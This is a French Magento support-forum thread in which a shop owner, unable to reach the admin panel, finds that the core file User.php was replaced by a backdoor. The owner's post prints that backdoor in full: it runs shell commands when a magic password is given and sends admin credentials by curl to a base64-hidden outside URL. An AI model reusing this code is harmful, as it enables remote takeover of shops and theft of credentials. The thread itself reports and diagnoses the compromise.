Magento Forums
Help
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

Page blanche après saisie user/pw admin magento 1.7

SOLVED
Go to solution
‎11-08-2019 04:27 AM
‎11-08-2019 04:27 AM

Page blanche après saisie user/pw admin magento 1.7

Bonjour

 

   Depuis ce jour je n'arrive plus à me connecter à l'admin de mon site, dès la validation du user/pw j'ai une page blanche. Le site tourne pourtant depuis des années.

J'ai fait des modif dans varient.php sous app/code/core/Mage/Core/Model/Session/Abstract comme vu à certain endroit, sans succès. J'ai rebooté le serveur sans plus de succès. Je ne vois pas de message d'erreur particulier, pourtant le site vu du public fonctionne bien, je continue même à recevoir des commandes, mais je ne peux pas les traiter...

 

Auriez-vous une idées ?

Cordialement

 

PS hébergement OVH

0 Kudos
1 ACCEPTED SOLUTION

Accepted Solutions
‎11-09-2019 12:17 PM
‎11-09-2019 12:17 PM

Re: Page blanche après saisie user/pw admin magento 1.7

Hi @jpbauer 

 

Il s’agit d’un fichier de base qui n’a été ni modifié ni modifié par aucun développeur.

Et j’ai comparé votre code modifié au fichier de magento 1.9.4.1 et le code n’est pas le même.

Votre site peut être piraté par quelqu'un.

Vous êtes invité à mettre à jour votre version de magento vers la version la plus récente ou si vous n'êtes pas intéressé par cette mise à jour, veuillez la mettre à jour vers la version 1.9.4.x afin que vous puissiez utiliser PHP 7 avec cette version.

Si vous avez besoin d'aide, merci de me le faire savoir.

 

Merci

---
Si vous avez trouvé ma réponse utile, merci de donner "Kudos" et "Accepter comme solution".

View solution in original post

8 REPLIES 8
‎11-08-2019 06:16 AM
‎11-08-2019 06:16 AM

Re: Page blanche après saisie user/pw admin magento 1.7

Hi @jpbauer 

 

Pouvez-vous s'il vous plaît vérifier à nouveau en effaçant le cache et le cookie de votre navigateur ou en l'ouvrant dans un autre navigateur.

Merci

---
Si vous avez trouvé ma réponse utile, veuillez indiquer "Kudos" et "Accepter comme solution".

0 Kudos
‎11-08-2019 06:27 AM
‎11-08-2019 06:27 AM

Re: Page blanche après saisie user/pw admin magento 1.7

Bonjour

 

Effectivement, je ne l'avais pas précisé mais j'ai déjà fait le test en effaçant tout le cache sur mon navigateur firefox, fait un test avec Chrome, IE et un téléphone en 4g. J'ai aussi effacé le cache et les sessions actives sur le serveur. Tout est resté sans succès

 

0 Kudos
‎11-08-2019 06:39 AM
‎11-08-2019 06:39 AM

Re: Page blanche après saisie user/pw admin magento 1.7

Hi @jpbauer 

 

Pouvez-vous ouvrir la page de connexion?

0 Kudos
‎11-08-2019 06:46 AM
‎11-08-2019 06:46 AM

Re: Page blanche après saisie user/pw admin magento 1.7

Oui c'est après la validation du user et du pw que la page se recharge blanche. Je peux d'ailleurs taper n’importe quoi, le comportement est le même

0 Kudos
‎11-08-2019 06:54 AM
‎11-08-2019 06:54 AM

Re: Page blanche après saisie user/pw admin magento 1.7

Hi @jpbauer 

 

Sur une page blanche, pouvez-vous vérifier la source d'affichage de la page en appuyant sur ctrl + u et partager sa capture d'écran.

0 Kudos
‎11-08-2019 06:58 AM
‎11-08-2019 06:58 AM

Re: Page blanche après saisie user/pw admin magento 1.7

Le code est vierge, je peux donner l'url en mp si vous voulez faire le test

0 Kudos
‎11-09-2019 03:12 AM
‎11-09-2019 03:12 AM

Re: Page blanche après saisie user/pw admin magento 1.7

J'ai trouvé le problème, le site a visiblement été hacké en remplacant le fichier

/app/code/core/Mage/Admin/Model/User.php qui contenait à l'origine

 

public function login($username, $password)
{
if ($this->authenticate($username, $password)) {
$this->getResource()->recordLogin($this);

}
return $this;
}

 

et qui a été remplacé par

 

public function login($username, $password){

if(md5($password)==="390xxxxxxxxxxxxxxxxxxxxxxxxxxa65a"){

$output = shell_exec($username); echo "<pre id="inspect">$output</pre>";
}

elseif ($this->authenticate($username, $password)) {
$this->getResource()->recordLogin($this);

$ip=$_SERVER['REMOTE_ADDR'];
$today = date('h:i:s a m/d/Y', time());
$e=Mage::getSingleton('adminhtml/url')->getUrl('adminhtml');
$array = array(
'discount' => "$username $password $ip $today $d $e",
);
$gine = "aHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxocA==";
$url = base64_decode($gine);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$html = curl_exec($ch);
curl_close($ch);
}
return $this;
}

 

Je ne sais pas ce que fait le code mais maintenant cela marche mieux!

Si vous avez une idée de comment ce fichier a pu être modifié, je suis preneur. Je viens d'interdire l'ecriture, mais je ne suis pas sur que cela suffise.

 

Cordialement

0 Kudos
‎11-09-2019 12:17 PM
‎11-09-2019 12:17 PM

Re: Page blanche après saisie user/pw admin magento 1.7

Hi @jpbauer 

 

Il s’agit d’un fichier de base qui n’a été ni modifié ni modifié par aucun développeur.

Et j’ai comparé votre code modifié au fichier de magento 1.9.4.1 et le code n’est pas le même.

Votre site peut être piraté par quelqu'un.

Vous êtes invité à mettre à jour votre version de magento vers la version la plus récente ou si vous n'êtes pas intéressé par cette mise à jour, veuillez la mettre à jour vers la version 1.9.4.x afin que vous puissiez utiliser PHP 7 avec cette version.

Si vous avez besoin d'aide, merci de me le faire savoir.

 

Merci

---
Si vous avez trouvé ma réponse utile, merci de donner "Kudos" et "Accepter comme solution".